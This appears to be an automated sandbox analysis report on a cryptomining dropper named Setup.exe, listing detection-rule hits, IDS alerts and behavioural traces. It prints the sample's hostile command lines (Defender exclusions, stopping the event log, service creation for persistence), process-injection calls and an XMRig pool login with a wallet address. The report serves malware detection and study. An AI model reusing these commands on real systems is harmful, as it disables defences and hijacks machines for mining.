Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 6476, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6520, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton, Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 1036, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, ProcessId: 1836, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 7144, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 972, ProcessName: svchost.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 6476, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto", ProcessId: 5388, ProcessName: sc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 1036, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" -Verb runAs, ProcessId: 1836, ProcessName: powershell.exe
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 72, ProcessName: svchost.exe

          HIPS / PFW / Operating System Protection Evasion

          Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe, ParentProcessId: 6476, ParentProcessName: Setup.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 1552, ProcessName: sc.exe
          Timestamp: 03/14/24-13:56:00.164561, SID: 2841335, Source Port: 59942, Destination Port: 22, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 03/14/24-13:56:02.320789, SID: 2841335, Source Port: 59948, Destination Port: 22, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 03/14/24-13:56:00.878567, SID: 2841335, Source Port: 59944, Destination Port: 22, Protocol: TCP, Classtype: A Network Trojan was detected
          Timestamp: 03/14/24-13:56:01.594395, SID: 2841335, Source Port: 59946, Destination Port: 22, Protocol: TCP, Classtype: A Network Trojan was detected


          AV Detection

          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Avira: detection malicious, Label: TR/AD.Nekark.ziece
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | ReversingLabs: Detection: 95%

          Bitcoin Miner

          Source: Yara match | File source: dump.pcap, type: PCAP
          Source: Yara match | File source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: dialer.exe PID: 6444, type: MEMORYSTR
          Source: global traffic | TCP traffic: 192.168.2.16:49704 -> 44.196.193.227:10128 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"86squ9t9d3pxzxftqg52h4kwdgkdjcdq2e2mzvdq4o173yaikjighkzdrbsl62iggeaeqpqx8uebbpkw6a3jkswleuwryin","pass":"dn120723340","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
          Source: dialer.exe | String found in binary or memory: cryptonight-monerov7
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_000002809238DCE0 FindFirstFileExW, 131_2_000002809238DCE0

          Networking

          Source: Traffic | Snort IDS: 2841335 ETPRO TROJAN ELF/Mirai Variant CnC Checkin 192.168.2.14:59942 -> 45.144.165.227:22
          Source: Traffic | Snort IDS: 2841335 ETPRO TROJAN ELF/Mirai Variant CnC Checkin 192.168.2.14:59944 -> 45.144.165.227:22
          Source: Traffic | Snort IDS: 2841335 ETPRO TROJAN ELF/Mirai Variant CnC Checkin 192.168.2.14:59946 -> 45.144.165.227:22
          Source: Traffic | Snort IDS: 2841335 ETPRO TROJAN ELF/Mirai Variant CnC Checkin 192.168.2.14:59948 -> 45.144.165.227:22
          Source: global traffic | TCP traffic: 192.168.2.16:49704 -> 44.196.193.227:10128
          Source: Joe Sandbox View | IP Address: 72.21.81.240
          Source: Joe Sandbox View | IP Address: 44.196.193.227
          Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
          Source: unknown | TCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown | DNS traffic detected: queries for: gulf.moneroocean.stream
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370106910.0000022ADE665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370296542.0000022ADE649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000006.00000003.1370089560.0000022ADE66A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1370947987.0000022ADE62B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: OfficeClickToRun.exe, 00000074.00000002.2761215419.000001570C208000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com
          Source: svchost.exe, 0000006B.00000000.1592264170.00000184E25FB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000002.2709297650.00000184E25FD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1604978379.00000184E2C40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comSRD1%
          Source: svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod
          Source: svchost.exe, 00000002.00000003.1203500301.0000016358DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
          Source: svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdC:
          Source: svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
          Source: svchost.exe, 00000002.00000003.1203500301.0000016358DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
          Source: svchost.exe, 00000058.00000000.1524557813.000002AB7F184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2C:
          Source: OfficeClickToRun.exe, 00000074.00000002.2678502917.000001570BEA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: OfficeClickToRun.exe, 00000074.00000002.2678502917.000001570BEA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1652CE
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize19g
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeation
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedty
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeened(
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeger
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeltip
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizenies
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeoggerp
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeols
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeoxy2
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizespacex
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizetos8
          Source: svchost.exe, 0000006B.00000000.1602961959.00000184E2AFF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comSRD1-
          Source: OfficeClickToRun.exe, 00000074.00000000.1700658907.000001570B606000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: svchost.exe, 0000006B.00000000.1599616250.00000184E28CD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: svchost.exe, 0000006B.00000000.1599616250.00000184E28CD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comN
          Source: svchost.exe, 0000006B.00000000.1602961959.00000184E2AFF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1605347716.00000184E2C79000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1605693530.00000184E2CFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comSRD13
          Source: svchost.exe, 00000006.00000003.1370296542.0000022ADE644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370142823.0000022ADE642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000006.00000003.1370218647.0000022ADE65B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1371055435.0000022ADE65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
          Source: svchost.exe, 00000058.00000000.1519460664.000002AB7DE12000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns2-ch1p.notify.windows.com/?token=AwYAAAAYHqKf08ZPoZ860Y%2foGt%2fNxdm9wovwzD08hc8iwriUJ1DW
          Source: svchost.exe, 0000006B.00000000.1602961959.00000184E2AFF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000006B.00000000.1606710274.00000184E2D4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comSRD1#
          Source: dialer.exe, 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          Operating System Destruction

          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process information set: 01 00 00 00
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process information set: 01 00 00 00

          System Summary

          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 81.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: dialer.exe PID: 6444, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\dialer.exe | Process Stats: CPU usage > 24%
          Source: C:\Windows\System32\dialer.exe | Code function: 41_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle
          Source: C:\Windows\System32\dialer.exe | Code function: 80_2_0000000140001394 NtAlpcOpenSenderProcess
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_00000280923828C8 NtEnumerateValueKey,NtEnumerateValueKey
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | File created: C:\Windows\TEMP\sidneyeifgjd.sys
          Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | File deleted: C:\Windows\System32\MRT.exe
          Source: C:\Windows\System32\dialer.exe | Code function: 41_2_000000014000226C
          Source: C:\Windows\System32\dialer.exe | Code function: 41_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exe | Code function: 41_2_0000000140002560
          Source: C:\Windows\System32\dialer.exe | Code function: 80_2_0000000140003240
          Source: C:\Windows\System32\dialer.exe | Code function: 80_2_00000001400027D0
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_00000280923944A8
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_000002809238DCE0
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_0000028092382B2C
          Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\sidneyeifgjd.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
